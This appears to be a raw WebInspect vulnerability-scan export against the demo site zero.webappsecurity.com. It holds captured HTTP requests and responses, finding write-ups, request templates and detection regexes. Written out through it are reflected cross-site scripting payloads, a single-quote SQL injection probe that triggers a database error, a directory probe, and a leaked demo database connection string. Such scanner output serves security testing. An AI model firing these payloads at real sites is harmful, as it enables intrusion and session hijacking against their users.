Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=<attack></textarea><script>alert('XSS')</script></attack>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>POST /login1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
login=\'&password=333%2D333%2D3333test@test999.com&graphicOption=minimumHTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:25 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 359
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'user = '\'''.</font>
<p>
<font face="Arial" size=2>/login1.asp</font><font face="Arial" size=2>, line 10</font> Database Server Error MessageA database server error message was found, indicating that WebInspect has generated an unhandled exception in your web application code. Unhandled exceptions are circumstances in which the application has received user input that it did not expect and does not know how to handle. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the database.<BR><BR>The most common cause of this error is a failure to properly sanitize client-supplied data that is used in SQL statements. It can also be caused by a bug in the web application's database communication code, a misconfiguration of database connection settings, or any other reason that would cause the application's database driver to be unable to establish a working session with the server.<P>The error message may also contain the location of the file that contains the offending function. This may disclose the webroot's absolute path as well as give the attacker the location of application "include" files or database configuration information. It may even disclose the portion of code that failed.
<BR><BR>
This check is part of WebInspect's unknown application testing. Unknown application testing seeks to uncover new vulnerabilities in both custom and commercial software. Because of this, there are no specific patches or descriptions of this issue.<br><br>Please note that this vulnerability may be a false positive if the page it is flagged on is technical documentation relating to a database server.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
login=\'&password=333%2D333%2D3333test@test999.com&graphicOption=minimum[SQL\sServer] Or Microsoft\sOLE\sDB\sProvider\sfor\sODBC\sDrivers Or [ODBC\sMicrosoft\sAccess\s97\sDriver] Or [ODBC\sMicrosoft\sAccess\sDriver] Or Microsoft\sJET\sDatabase\sEngine Or [Oracle]ORA Or [ODBC\sdriver\sfor\sOracle] Or Microsoft\sOLE\sDB\sProvider\sfor\sOracle Or ODBC\sError Or [ODBC\sOracle\s8\sdriver] Or ADODB.Recordset.1 Or Microsoft\sOLE\sDB\sProvider\sfor\sSQL\sServer Or syntax\serror\sin\sorder\sby Or Dynamic\sPage\sGeneration\sError: Or quoted\sstring\snot\sproperly\sterminated Or DBD::Oracle Or COM.ibm.db2.jdbc.DB2ExceptionPOST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 148
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=1"style="background:url(javascript:alert('XSS'))"%20"HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:56 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 127
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data 1"style="background:url(javascript:alert('XSS'))" "<br>Please try again.
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 148
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>"style="background:url\(javascript:alert\('XSS'\)\)POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=>"><script>alert("XSS")</script>&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 381
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = >"><script>alert("XSS")</script></P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=<attack>>"><script>alert("XSS")</script></attack>&txtLastName=Swinney<script>alert\("XSS"\)<\/script>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 146
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=1"style="background:url(javascript:alert('XSS'))"%20"&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 367
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = 1"style="background:url(javascript:alert('XSS'))" "</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 146
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&txtFirstName=Joe&txtLastName=Swinney"style="background:url\(javascript:alert\('XSS'\)\)GET /join.asp?name=&email=&surname=&house=1"style="background:url(javascript:alert('XSS'))"%20"&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:24 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /_vti_cnf/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:42 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Directory (_vti_cnf)FrontPage Directory: /_vti_cnf/Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password
protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /_vti_cnf/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
